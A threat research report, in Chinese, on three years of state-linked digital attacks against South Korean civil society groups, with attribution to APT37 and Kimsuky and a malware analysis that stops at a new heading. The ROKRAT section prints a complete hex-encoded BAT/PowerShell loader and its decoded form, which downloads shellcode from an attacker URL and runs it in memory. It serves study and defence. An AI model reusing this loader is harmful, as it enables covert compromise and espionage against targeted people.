针对性威胁研究 - 韩国和朝鲜（韩国 3 年威胁研究的细目）

1：执行摘要

这项研究强调了民间社会组织 (CSO) 在识别和缓解针对韩国活动家、记者和人权捍卫者的数字威胁方面发挥的关键作用。与依赖遥测数据的私营部门实体不同，CSO 可以直接访问受害者的体验、设备和基础设施。这一独特的优势使人们能够更深入地了解攻击活动、其动机及其更广泛的影响。

主要发现：

• 通过直接接触增强威胁可见性——与受害者密切合作，可以深入了解对手的策略、技术和程序 (TTP)。这种第一手资料使 CSO 能够以比传统私营部门方法更高的准确度跟踪、记录和分析攻击。

• 可操作的威胁情报和关联分析– 将原始数据转换为有意义的情报的能力有助于识别特定的攻击活动、预测未来的威胁并及时干预。通过关联看似孤立的事件，CSO 可以发现更大规模的协同活动，从而确保更有效的防御机制。

• 主动安全与快速响应——情报驱动的方法使 CSO 和热线能够超越被动措施，在威胁升级之前预测并消除威胁。教育潜在受害者、增强抵御能力和提供快速事件响应是这一主动战略的关键组成部分。

通过直接与受害者接触、实时情报收集和全面的相关性分析，民间社会组织在保护高风险社区方面发挥着关键作用。这项研究强调，需要进一步合作、支持和投资民间社会主导的网络安全工作，以有效缓解数字威胁。

2：简介

作为一名人权民间社会活动家，我的目标是为人权提供倡导、支持和行动。我在这项研究中的工作具体旨在关注影响韩国活动家的针对性威胁。这项工作的性质基于这样一个事实，即该地区的活动家得到的服务和支持严重不足。鉴于数字攻击对全球活动家来说都是一种高度普遍的风险，韩国是一个极具挑战性的地区，活动家受到多种技术高超、资源丰富的高级持续性威胁 (APT) 的影响。朝鲜的人权状况导致韩国大量民间社会团体致力于支持受到朝鲜政权威胁的人们。致力于朝鲜相关人权问题、统一倡导和报道的人权活动家和记者成为民族国家威胁行为者数字攻击的重点。在许多国家，人权活动家通常会受到来自本国政府的攻击；在亚洲的某些地区，外部政府正在对活动人士进行高度针对性和复杂的攻击，这些政府包括朝鲜。

本报告基于近 3 年对影响韩国 5 个民间社会组织 (CSO) 的针对性数字威胁的技术分析。该报告包含两种主要技术分析方法：

i. 对数字威胁进行初步的人工分析

本节结合了威胁研究分析、取证、指标分析、静态和动态逆向工程。完全专注于对受监控的 CSO 进行数字威胁的手动混合方法分析。

ii. 聚类自动化分析

利用指标聚类方法，从每个单独事件中提取上下文和关联数据。然后使用数据库进行关联分析。威胁情报关联允许调查两个或多个威胁元素，这可能包括服务器位置信息、IP 地址、恶意软件配置和威胁参与者。这样做的主要结果是允许对威胁进行批判性分析和决策，而如果没有更广阔的视野，这些威胁可能无法从上下文中理解。

这两种综合分析方法的结果随后被汇总到报告中的两个部分。第一部分包括调查结果的执行摘要，旨在强调关键的发现、知识和信息，特别注重高层次的理解。本节旨在推动社区内利益相关者做出关键决策，以推动行动和有影响力的决策。第二部分研究了本研究收集的数据和研究的技术细节。这构成了第一部分中提出的主张的证据数据。

方法论、研究结果概述和数据分析突出了我的方法的总体情况，定义了研究方法。随后，研究中的每个关键发现都进行了技术详细讨论。我希望，本节中强调的技术细节可以进一步促进对该地区威胁的技术理解，并邀请就此事进行进一步合作。上下文数据用于丰富我的集群数据集中的技术信息。此数据集已解释并将在未来提供。

聚类分析提供了在整个研究过程中关联事件时得出的上下文和关系指标中发现的关键信息的调查。

3：方法论

3.1：样本提交

本研究样本收集的主要依据是通过电子邮件提交。如果研究参与者发现或成为恶意、可疑或未知电子邮件的受害者，他们会联系我进行进一步调查。如果有的话，我们会获取完整的标头、样本收集和链接。如果有效载荷是 stager 或 dropper，我们会进行分析以提取进一步的攻击指标，例如命令和控制 IP 地址。

观察到少数案例，受害者是通过微信等通讯应用程序联系的。这些案例在研究中被单独记录。

3.2：审计

这项工作还包括定期对 CSO 的数字基础设施进行审计。在此审计过程中，在对设备进行取证时获得了可疑文件、通信或网络流量。

研究本身并不代表对所有影响 CSO 参与的攻击的全面识别，因为数据收集方法带有偏见，我只能分析提供给我的内容或在审计期间发现的内容。有必要在整个研究过程中考虑到这一点。

3.3：恶意软件分析

进行恶意软件分析的方法涉及静态和动态分析工具。这些工具包括 IDA Pro、OllyDBG 和 WinDBG 等工具。这与手动分析相辅相成，以对恶意代码进行逆向工程并提取恶意软件配置。恶意软件配置可以包括命令和控制 (C2) 基础设施、互斥锁和函数名称等。此外，动态工具用于执行恶意软件的动态执行和实体提取。诸如 Cuckoo 之类的工具被用于离线机制中，用于敏感样本。对于不敏感的样本，使用在线沙盒工具（例如 Any.run）并启用私人提交功能。在线 open-sIce 威胁情报工具，例如 VirusTotal 和 URLScan.io

3.4：电子邮件内容分析

在可能的情况下，获取电子邮件内容的副本，其中包括主题行、正文和附件以及完整的标头信息。分析标头，提取原始发件人电子邮件地址和基础设施。从这些电子邮件中提取的指标被输入到 I 威胁情报数据库中。在可能的情况下，通过添加 open-sIce 威胁情报分析进行了丰富。电子邮件内容上下文被添加到数据集中的附加字段。

3.5：被动 DNS 与开源威胁情报

被动 DNS 和开源威胁情报工具（如上文所述，VirusTotal 和 URLScan.io）通常用于提供任何有助于支持威胁研究的额外背景和相关信息。由于这些服务是开源的，并且通常是公开可用的信息来源，因此在某些情况下需要许可证才能私下提交样本和信息，而这些数据可能被视为敏感数据。在大多数情况下，这种敏感性仅与向威胁行为者透露正在进行的研究有关，而不是对提交者或合作伙伴的风险。如果信息对提交者或合作伙伴来说很敏感，则不会使用这些服务。

4：数据概览

4.1：聚类分析

为了针对恶意软件家族、共享基础设施、恶意软件配置、策略技术和程序中的模式进行聚类，我们利用私有的 MISP 威胁共享解决方案 ( https://www.misp-project.org/ ) 建立了联系。MISP 的解决方案提供了一种开源软件，允许向事件添加上下文数据，从而支持对数据进行聚类、标记和分类。这允许自定义配置关系元素（例如恶意软件配置或威胁组），以便从与其他事件相关的单个事件中提取信息上下文。

图 1：MISP 星系聚类示例（https://www.misp-project.org/2020/07/31/MISP-galaxy-101.html/）

我在本研究中记录的样本提交的最早日期是 2020-10-17。我收集样本的最新日期是 2023-12-08。在 39 个月的时间内共收集了 102 个样本。下图突出显示了提交量，通常这些节奏与受害者受到威胁行为者的影响并报告问题的时间有关。在某些情况下，这些与对组织进行的审计有关，尽管这些很少相关。

图 2：样本记录频率

在研究过程中，除了应用钻石模型之外，我还使用了聚类技术来进行威胁行为者的关联和归因。

用于威胁情报的钻石模型是网络安全中用于理解和分析网络威胁的概念框架，特别是在网络攻击和入侵的背景下。该模型由研究人员 Andrew Pendergast、Christopher Rohlf 和 Sergio Caltagirone 开发。

图 3.https: //warnerchad.medium.com/diamond-model-for-cti-5aba5ba5585

钻石模型允许通过检查构成钻石形状的顶点的关键元素来理解和了解攻击活动的背景：

1. 对手：这是指入侵背后的威胁行为者或团体。它涉及了解对手的动机、能力、策略、技术和程序 (TTP)。

2. 基础设施：这包括攻击者用于进行入侵的基础设施或资源。其中包括域、IP 地址、服务器、恶意软件和攻击中使用的其他工具。

3. 受害者：受害者代表入侵的目标，例如个人、组织或系统。了解受害者需要分析他们的资产、漏洞以及入侵对他们的影响。

4. 能力：这些是攻击者在入侵期间采取的行动或活动。这包括侦察、利用、横向移动、数据泄露以及网络杀伤链的任何其他阶段。

这四个要素之间的关系构成了菱形的侧面：

• 对手与基础设施：这种关系涉及了解对手如何与他们的基础设施（例如他们控制的域和服务器）交互。

• 对手与受害者：这种关系主要关注对手如何瞄准受害者并与其互动，包括用于危害受害者的策略和技术。

• 对手与能力：这种关系探讨了对手在整个入侵生命周期中如何运用各种能力和 TTP。

• 受害者与基础设施：这种关系研究受害者如何与对手的基础设施互动，例如通过网络流量或与命令和控制服务器的通信。

通过分析这些关系并了解不同元素之间的相互作用，分析师可以深入了解活动的性质，识别模式并制定有效的缓解策略。首先，这可以支持活动事件之间的相关性，从而支持归因。通过这项研究，每个事件都被记录并存储在数据库中，其中钻石模型的每个元素都可以与其他事件相关联。其结果允许对事件中的关系元素进行细粒度研究。

除了利用我的威胁情报数据库和钻石模型等概念框架外，开源威胁情报平台的使用以及与业界的闭源威胁情报交流也帮助我们对攻击活动做出独特的归因分析。网络安全中的归因分析通常具有挑战性，需要像这样的聚类技术来支持有效的主张。

在对 102 起事件进行分析的过程中，我发现在 73 起事件中，我无法建立与对手、基础设施、受害者或能力相关的任何关联，从而无法确定该事件的确切威胁行为者。尽管在某些情况下，可以根据相似性或上下文理解推断出归因，但我选择仅对有确凿证据表明可以归因的事件进行分类。

我发现数据集中的 20 个事件归因于我归类为 UCID902（未识别集群标识符 [902 是观察到的第一个日期]）的威胁行为者。在本报告的后面部分，我将提供有关此威胁行为者的详细信息，但在这一点上，描述此威胁行为者的背景很重要。UCID902 被发现持续以 CSO 为目标进行凭证网络钓鱼活动。该地区的 CSO 通常将这些活动视为无害的 Naver 登录凭证盗窃行动，然而经过钻石模型分析，我发现这个威胁行为者有许多基础设施重叠。我没有看到它与任何已知的公开威胁组织有任何关联，但它表现出明显的针对性威胁活动。我相信这个威胁行为者是一个受民族国家支持的行为者，并且由于他们的持久性、受害者学和诱饵内容；我相信这个威胁行为者对朝鲜的人权问题感兴趣。

发现的 3 起事件与 APT37 具有明确且高度可信的关联。APT37 是一个由朝鲜政府发起的高级持续性威胁组织。该组织至少自 2012 年以来一直活跃，以主要针对韩国、日本和其他邻国开展间谍活动而闻名，尽管它也被发现针对全球实体。

APT37 以其先进的能力和使用各种攻击技术而闻名，包括鱼叉式网络钓鱼、恶意软件部署和零日漏洞。该组织与多起引人注目的攻击有关，包括针对非营利组织、政府机构、国防承包商、媒体组织和金融机构的攻击。APT37 的主要目标之一似乎是收集该地区政治和军事问题的情报，以及窃取知识产权和进行破坏性或破坏性的网络行动。据了解，该组织使用各种恶意软件工具，包括 ROKRAT 等远程访问木马 (RAT)。

据信，APT37 的活动得到了朝鲜政府的协调和支持，尽管该组织与朝鲜政府之间的具体关系仍不清楚。

6 起事件与 Kimsuky 有明显且高度可信的关联。Kimsuky 是一个据信来自朝鲜的网络间谍组织。Kimsuky 又名 Velvet Chollima 或 Thallium，自 2012 年以来一直活跃，以其针对 CSO、政府、国防承包商、研究机构和其他组织的复杂网络行动而闻名，主要针对韩国。该组织擅长使用社会工程策略、鱼叉式网络钓鱼活动和恶意软件部署来获取敏感信息的未经授权的访问权限并开展情报收集活动。据信，Kimsuky 的活动与朝鲜政府的战略利益相一致，尽管该组织与政府之间的确切关系仍不太清楚。美国政府和许多行业专业人士认为 Kimsuky 与朝鲜侦察总局 (RGB) 有关，后者是朝鲜的主要对外情报机构。由于该组织的攻击行动经常与朝鲜半岛的地缘政治事件和紧张局势相吻合，因此表明其议程符合 RGB 的利益。

图 4：归因计数

4.2：MITRE 攻击框架

数据集中看到的预攻击技术被映射到 Mitre 攻击框架。结果如下图所示，突出显示了所使用的热图攻击向量，颜色标度表示它们在数据集中的流行程度。

图 5. MITRE 攻击框架映射的上半部分

图 6. MITRE 攻击框架映射的下半部分

为了分解攻击前类别中最普遍的攻击媒介，我从数据集中确定了以下结果：

• 针对韩国活动人士的攻击通常涉及一种涉及社会工程学的预攻击手段。

• 我发现鱼叉式网络钓鱼电子邮件不断被使用，这些电子邮件旨在引诱或迫使受害者与攻击者通信或打开恶意文件/文档。

• 在大多数情况下，社会工程学针对的是民间社会组织内的关键个人，并且经常使用与该组织相关或关联的品牌材料。

• 在部分案例中，我看到了最初的预攻击试图收集更多信息，包括关键人物来源、信息收集和与 IP 地址泄露有关的恶意代码。这表明有针对受害者的侦察和信息来源操作是故意的。

• 在少数情况下，我看到威胁行为者专门尝试创建在线角色和身份，这些角色和身份与针对不同 CSO 的攻击相关。虽然这种情况并不普遍，但它表明针对我所合作的组织的威胁行为者发生了有趣的转变。

• 在一次持续的活动中，我看到一个威胁行为者通过社会工程技术讨论的方式专门对组织内部的漏洞进行侦察。

下面详细介绍了在获得初始攻击或对有效载荷进行逆向工程时威胁行为者的主要攻击方法：

图 7. 事件主要攻击分类数据热图

为了分解 ATT＆CK 框架攻击类别中的主要攻击媒介，我从数据集中确定了以下关键结果：

数据集中针对 CSO 的威胁主要采用的方式与鱼叉式网络钓鱼链接或附件有关。

通常，鱼叉式钓鱼链接会通过引诱用户在伪装的网页中输入电子邮件/用户名和密码来执行输入捕获，从而获取用户的凭证。

鱼叉式网络钓鱼附件由恶意软件植入程序或远程访问木马 (RAT) 组成。我将在本报告的后面部分讨论恶意软件使用的具体细节

5：攻击前及主要攻击事件分析

5.1：社会工程学

在研究过程中，我总共发现了 13 起社会工程攻击。社会工程是威胁行为者用来欺骗和利用个人的一种操纵技术，导致他们泄露机密信息或执行危害安全的行为。这种方法利用心理操纵而不是技术漏洞，依靠人类的弱点来获得对系统、数据或网络的未经授权的访问。常见的策略包括网络钓鱼电子邮件、借口、诱饵和尾随，通常针对组织内的关键个人，以最大限度地发挥攻击的影响。

最主要的社会工程活动涉及一名冒充自由朝鲜运动代表的威胁行为者。攻击者使用电子邮件“ [email protected] ”最初与韩国人权活动家就朝鲜人权问题进行接触。如下图所示，攻击者试图通过引诱该地区的活动家参与电视上的大型政治活动来与他们建立关系。

图 8. 翻译后的社会工程电子邮件示例

图 9. 原始电子邮件的屏幕截图

在收集这些事件后，同月我发现了进一步的企图，即强迫受害者与威胁行为者进行沟通。我发现从“beroiapark”电子邮件地址发送了许多文件。发送给最初的受害者和我合作过的其他组织。许多文档都包含指向凭证收集页面的链接，或者当我意识到该事件时，有效载荷主机已经关闭。在大多数情况下，我看到这个威胁行为者在 1 天后关闭了有效载荷交付主机。

图 10. 有效载荷交付的屏幕截图

（“我是自由朝鲜运动联盟代表朴尚学。对于因电子邮件给您带来的不便，我深表歉意。我将再次向您发送问卷。如果您在查看时遇到问题，请联系我们。自由朝鲜运动联盟代表朴尚学”）

其余的社会工程事件可以在未来几个月内发布的公共数据集中找到。

5.2：恶意软件家族

在研究过程中，我能够识别出多个新型和/或流行的恶意软件活动。在本节中，我将重点介绍发现的最复杂和/或最流行的恶意软件。

我还分析了值得注意的 CVE 的识别、电子邮件内容分析，并对本研究中获得的样本进行了 AV 检测分析。

5.2.1：Windows 攻击活动

ROKRAT Windows 恶意软件

ROKRAT 是一种恶意软件，长期以来被认为是 APT37 的威胁行为者所为。APT37 是一个由朝鲜政府发起的高级持续性威胁组织。该组织至少从 2012 年开始活跃，以主要针对韩国、日本和其他邻国开展间谍活动而闻名，尽管它也被发现针对全球实体。

APT37 以其先进的能力和使用各种攻击技术而闻名，包括鱼叉式网络钓鱼、恶意软件部署和零日漏洞。该组织与多起引人注目的攻击有关，包括针对非营利组织、政府机构、国防承包商、媒体组织和金融机构的攻击。

APT37 的主要目标之一似乎是收集该地区政治和军事问题的情报，以及窃取知识产权和进行破坏性或破坏性的网络行动。据悉，该组织使用各种恶意软件工具，包括 ROKRAT 等远程访问木马 (RAT)。

据信，APT37 的活动得到了朝鲜政府的协调和支持，尽管该组织与政府之间的确切关系仍不太清楚。自 2022 年以来，我研究记录了许多 Windows ROKRAT 恶意软件活动。我强烈建议查看 CheckPoint 对 ROKRAT 的研究（https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link）以了解更多背景信息。

这些恶意软件攻击通常包含具有对象链接或嵌入 (OLE) 的文档。恶意 HWP（Hangul Word Processor）对象链接和嵌入 (OLE) 文档是指一种网络威胁，攻击者使用 OLE 技术将有害内容或代码嵌入 HWP 文件中。HWP 是韩国流行的文字处理软件，由 Hancom Inc. 开发，而 OLE 是一种允许将对象（如文档、图像或多媒体）从一个应用程序嵌入或链接到另一个应用程序的技术。

在网络攻击中，攻击者可能利用 HWP 软件中的漏洞或使用社会工程学手段诱骗用户打开恶意 HWP 文档。一旦用户打开这些文档，这些文档便会执行嵌入的脚本、启动恶意软件或利用系统漏洞，从而可能导致数据被窃取、系统被入侵或进一步渗透到受害者的网络。

kopo1scom98 活动

2022 年，我发现了一场源自“kopo1scom98”角色的活动，该活动向韩国各地的活动人士发送电子邮件，内容为：

“国家选举委员会将公开招募计票观察员，观察 2 月 8 日至 12 日举行的第 20 届总统选举的计票情况。计票观察员可以随时在投票站内巡视、监视或拍摄计票情况，当发现任何与计票有关的违法行为时，可以要求纠正。公开招募计票观察员是自 2016 年第 20 届国会选举以来为提高计票过程透明度而实施的制度。那些希望成为计票观察员的人可以在国家选举委员会网站 (www.nec.go.kr) 上验证身份后填写申请表，也可以向对其地址有管辖权的区/市/郡选举委员会书面申请。凡有投票权者均可申请，但非韩国公民、未成年人（18岁以下）、公务员

等除外。”

该电子邮件包含一个 HWP 文档，其中嵌入了一个 BAT 脚本形式的 OLE 对象。一旦用户单击 OLE 对象，BAT 脚本就会执行，进而对受害者的机器发起基于 PowerShell 的反射式 DLL 注入攻击。有效载荷从以下位置加载到内存中：

https://[.]work3[.]b4a[.]app/

@echo off
IF EXIST "%PROGRAMFILES(X86)%" (set pspath="%windir%syswow64WindowsPowerShellv1.0powershell.exe")
ELSE (set pspath="%windir%system32WindowsPowerShellv1.0powershell.exe")
start "" %pspath% -command "$ttms="$eruk2=""""246B6B79343D275B446C6C496D706F727428227573657233322E646C6C22295D2
07075626C6963207374617469632065787465726E20626F6F6C2053686F7757696E646F7728696E742068616E646C652C20696E742073746
17465293B273B246D6D79343D4164642D54797065202D4D656D626572446566696E6974696F6E20246B6B7934202D4E616D6520226B6B793
422202D50617373546872753B246D6D79343A3A53686F7757696E646F7728285B53797374656D2E446961676E6F73746963732E50726F636
573735D3A3A47657443757272656E7450726F636573732829207C204765742D50726F63657373292E4D61696E57696E646F7748616E646C6
52C2030293B246179343D4765742D576D694F626A6563742057696E33325F50726F63657373202D66696C74657220224E616D65206C696B6
520274877702527223B246279343D246179342E4E616D653B246379343D246179342E436F6D6D616E644C696E653B69662824627934297B2
46479343D222F63207461736B6B696C6C202F66202F696D20222B246279343B636D6420246479343B776169742D70726F636573732024627
9342E53706C697428275C2E27295B2D325D3B246579343D246379342E53706C697428272227292E636F756E743B696628246379345B305D2
02D657120272227297B69662824657934202D65712033297B246679343D246379342E53706C697428272227295B325D2E53706C697428272
027295B315D3B7D656C736569662824657934202D65712035297B246679343D246379342E53706C697428272227295B335D3B7D7D656C736
57B69662824657934202D65712033297B246679343D246379342E53706C697428272227295B315D3B7D656C73657B246679343D246379342
E53706C697428272027295B315D3B7D7D246779343D222222222B24656E763A54454D502B225C68686272676F66362E746D70222B2222222
23B246879343D222222222B24656E763A54454D502B225C3332372E626174222B222222223B246979343D222222222B246679342B2222222
23B246479343D222F6320636F7079202F7920222B246779342B2220222B246979343B24706579343D303B24707379343D2730273B646F7B2
4706579342B2B3B24707379343D636D6420246479343B736C65657020313B6966282470657934202D65712035297B627265616B3B7D7D776
8696C652824707379342E5472696D28295B305D202D6E6520273127293B737461727420246979343B7D246A79343D22636D64202F6320646
56C202F6620222B20246779343B636D6420246A79343B246A79343D22636D64202F632064656C202F6620222B20246879343B636D6420246
A79343B5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A5
46F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B246C79343D275B446C6C496D706
F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6
C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246C7934202
D4E616D6520224141412220202D50617373546872753B246D7934203D20275B446C6C496D706F727428226B65726E656C33322E646C6C222
95D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E742
0622C75696E7420632C6F757420496E745074722064293B273B246B79343D4164642D54797065202D4D656D626572446566696E6974696F6
E20246D7934202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E5
76562436C69656E743B24643D2268747470733A2F2F776F726B332E6234612E6170702F646F776E6C6F61642E68746D6C3F69643D3838267
365617263683D545568334D3078455A334E50517A52345445524664325A48536E5A61534774315A45644761574A485658464C617A6B77595
5645765575A4965476C694D6C49315447355361466C746547773D223B246E79343D275B446C6C496D706F727428226B65726E656C33322E6
46C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C7
5696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B247179343D4164642D5479706
5202D4D656D626572446566696E6974696F6E20246E7934202D4E616D65202242424222202D50617373546872753B246F79343D275B446C6
C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220576169744
66F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B247479343D4164642D54797065202D4D656D6265724
46566696E6974696F6E20246F7934202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2
024632E486561646572735B22757365722D6167656E74225D203D2022757575757575757575223B247079343D24632E446F776E6C6F61644
4617461282464293B24757934203D2024623A3A476C6F62616C416C6C6F63283078303034302C20247079342E4C656E6774682B307831303
0293B24727934203D20303B246B79343A3A5669727475616C50726F7465637428247579342C20247079342E4C656E6774682B30783130302
C20307834302C205B7265665D24727934293B666F7220282468203D20303B2468202D6C7420247079342E4C656E6774683B24682B2B29207
B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282475793
42C2024682C20247079345B24685D293B7D3B7472797B7468726F7720313B7D63617463687B247379343D247179343A3A437265617465546
87265616428302C302C247579342C302C302C30293B247479343A3A57616974466F7253696E676C654F626A65637428247379342C2035303
02A31303030293B7D3B24653D3232323B7D63617463687B736C65657020323B24652B2B3B7D7D7768696C65282465202D6C7420313134293
2022_2_6-”20th_Presidential Election”4B"""";
$blwp="""""";
for($i=0;$i -le $eruk2.Length-2;$i=$i+2){$NTMO=$eruk2[$i]+$eruk2[$i+1];$blwp= $blwp+[char]([convert]::toint16($N
TMO,16));};
Invoke-Command -ScriptBlock ([Scriptblock]::Create($blwp));";
Invoke-Command -ScriptBlock ([Scriptblock]::Create($ttms));”

为了快速解码这些活动，我开发了一个开源工具来支持解码这些有效载荷（https://github.com/0x0v1/MalwareRETools/blob/main/APT37/ROKRAT/ROKRATPSDecoder.py?ref=0x0v1.com）。它只是使用 extract_hexadecimal_value 函数解码输入中的十六进制值，将它们转换为 ASCII 字符。解码后的输出结果如下：

$kky4='[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
$mmy4=Add-Type -MemberDefinition $kky4 -Name "kky4" -PassThru;
$mmy4::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
$ay4=Get-WmiObject Win32_Process -filter "Name like 'Hwp%'";
$by4=$ay4.Name;
$cy4=$ay4.CommandLine;
if($by4){$dy4="/c taskkill /f /im "+$by4;
cmd $dy4;
wait-process $by4.Split('.')[-2];
$ey4=$cy4.Split('"').count;if($cy4[0] -eq '"')
{if($ey4 -eq 3){$fy4=$cy4.Split('"')[2].Split(' ')[1];}
elseif($ey4 -eq 5){$fy4=$cy4.Split('"')[3];}}
else{
if($ey4 -eq 3){$fy4=$cy4.Split('"')[1];}
else{$fy4=$cy4.Split(' ')[1];}}
$gy4=""""+$env:TEMP+"hhbrgof6.tmp"+"""";
$hy4=""""+$env:TEMP+"327.bat"+"""";
$iy4=""""+$fy4+"""";
$dy4="/c copy /y "+$gy4+" "+$iy4;$pey4=0;
$psy4='0';
do{
$pey4++;
$psy4=cmd $dy4;
sleep 1;
if($pey4 -eq 5)
{break;}}
while($psy4.Trim()[0] -ne '1');
start $iy4;}
$jy4="cmd /c del /f "+ $gy4;
cmd $jy4;
$jy4="cmd /c del /f "+ $hy4;
cmd $jy4;
[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072);
$ly4='[DllImport("kernel32.dll")]public static extern IntPtr GlobalAlloc(uint b,uint c);';
$b=Add-Type -MemberDefinition $ly4 -Name "AAA" -PassThru;
$my4 = '[DllImport("kernel32.dll")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr
d);';
$ky4=Add-Type -MemberDefinition $my4 -Name "AAB" -PassThru;
$c = New-Object System.Net.WebClient;
$d="https://work3.b4a.app/download.html?id=88&search=TUh3M0xEZ3NPQzR4TERFd2ZHSnZaSGt1ZEd
GaWJHVXFLazkwYUdWeWZIeGliMlI1TG5SaFlteGw=";
$ny4='[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint
e,IntPtr f);';
$qy4=Add-Type -MemberDefinition $ny4 -Name "BBB" -PassThru;
$oy4='[DllImport("kernel32.dll")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);';
$ty4=Add-Type -MemberDefinition $oy4 -Name "DDD" -PassThru;
$e=112;
do {
try { $c.Headers["user-agent"] = "uuuuuuuuu";
$py4=$c.DownloadData($d);
$uy4 = $b::GlobalAlloc(0x0040, $py4.Length+0x100);
2022_2_6-”20th_Presidential Election”5$ry4 = 0;
$ky4::VirtualProtect($uy4, $py4.Length+0x100, 0x40, [ref]$ry4);
for ($h = 0;$h -lt $py4.Length;$h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($uy4, $h, $py4[$h]);};
try{throw 1;}
catch{$sy4=$qy4::CreateThread(0,0,$uy4,0,0,0);
$ty4::WaitForSingleObject($sy4, 500*1000);};$e=222;}
catch{sleep 2;$e++;}}while($e -lt 114);

这里描述的非常相似的样本：带有 BAT 脚本的恶意 HWP 文件正在主动分发（朝鲜/国防/广播） - ASEC BLOG（ahnlab.com）。

在研究时，shellcode 暂存器已关闭，因此无法提取加载到内存中的 shellcode。

https://work3[.]b4a[.]app/download.html?id=88&search=TUh3M0xEZ3NPQzR4TERFd2ZHSnZaSGt1ZEdGaWJHVXFLazkwYUdWeWZIeGliMlI1TG5SaFlteGw=

该示例利用 Add-Type cmdlet 添加类的定义。首先，它创建名为 kky4 的类：

$kky4='[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
$mmy4=Add-Type -MemberDefinition $kky4 -Name "kky4" -PassThru;
$mmy4::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0)

当执行 Add-Type cmdlet 时，PowerShell 会在主机上调用 CSC.exe（Visual C# 命令行编译器），这是在受害者身上观察到的值得注意的 TTP（Powershell.exe → CSC.exe → cvtres.exe）。CSC 用于将此类定义编译为程序集，以供 PowerShell 脚本使用。在 %appdata%localtemp 中会创建一个临时文件，扩展名为 .cmdline。在本例中，示例创建了此文件：

C:UsersLouiseAppDataLocalTempuzicvxsduzicvxsd.cmdline:
/t:library /utf8output /R:"System.dll" /R:"C:WindowsMicrosoft.NetassemblyGAC_MSILSystem.Management.Automati
onv4.0_3.0.0.0__31bf3856ad364e35System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:UsersLouiseA
ppDataLocalTempuzicvxsduzicvxsd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:UsersLouiseAppDataLo
calTempuzicvxsduzicvxsd.0.cs"

由于 Add-Type 终止后所有文件都会被删除，因此这种攻击方法对磁盘的文件影响相对较小，从而支持攻击者进行混淆。该脚本利用 WMI 查找 HWP 并终止该进程。这是一个值得注意的模式，因为这种情况并不常见。然后，它会对两个文件 hhbrgof6.tmp 和 327.bat 执行一些清理操作。

$ay4=Get-WmiObject Win32_Process -filter "Name like 'Hwp%'";
$by4=$ay4.Name;
$cy4=$ay4.CommandLine;
if($by4){$dy4="/c taskkill /f /im "+$by4;
cmd $dy4;
wait-process $by4.Split('.')[-2];
$ey4=$cy4.Split('"').count;if($cy4[0] -eq '"')
{if($ey4 -eq 3){$fy4=$cy4.Split('"')[2].Split(' ')[1];}
elseif($ey4 -eq 5){$fy4=$cy4.Split('"')[3];}}
else{
2022_2_6-”20th_Presidential Election”6if($ey4 -eq 3){$fy4=$cy4.Split('"')[1];}
else{$fy4=$cy4.Split(' ')[1];}}
$gy4=""""+$env:TEMP+"hhbrgof6.tmp"+"""";
$hy4=""""+$env:TEMP+"327.bat"+"""";
$iy4=""""+$fy4+"""";
$dy4="/c copy /y "+$gy4+" "+$iy4;
$pey4=0;
$psy4='0';
do{
$pey4++;
$psy4=cmd $dy4;
sleep 1;
if($pey4 -eq 5)
{break;}}
while($psy4.Trim()[0] -ne '1');
start $iy4;}
$jy4="cmd /c del /f "+ $gy4;
cmd $jy4;
$jy4="cmd /c del /f "+ $hy4;
cmd $jy4;

然后，他们使用 TLS12 设置 SSL/TLS 安全通道：

[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072)

随后进一步创建附加类，这次导入 Kernel32 以访问 GlobalAlloc 和 VirtualProtect 方法：

$ly4='[DllImport("kernel32.dll")]public static extern IntPtr GlobalAlloc(uint b,uint c);';
$b=Add-Type -MemberDefinition $ly4 -Name "AAA" -PassThru;
$my4 = '[DllImport("kernel32.dll")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d);';
$ky4=Add-Type -MemberDefinition $my4 -Name "AAB" -PassThru;

C2 被声明为变量。然后他们为 shellcode 分配内存：

$uy4 = $b::GlobalAlloc(0x0040, $py4.Length+0x100)

然后利用 VirtualProtect 使内存部分可执行。

$ky4::VirtualProtect($uy4, $py4.Length+0x100, 0x40, [ref]$ry4);

最后，从下载的程序集中写入字节，对可执行代码造成威胁，并调用 WaitForSingleObject 等待线程结束。

or ($h = 0;$h -lt $py4.Length;$h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($uy4, $h, $py4[$h]);};

完成后，包含 ROKRAT 的恶意 shellcode 将在内存中执行。样本：5fec6e533fb9741997530a3d43b60ee44e2e6dc0fd443ef135b9d311b73d92a8

“SuperBear”活动

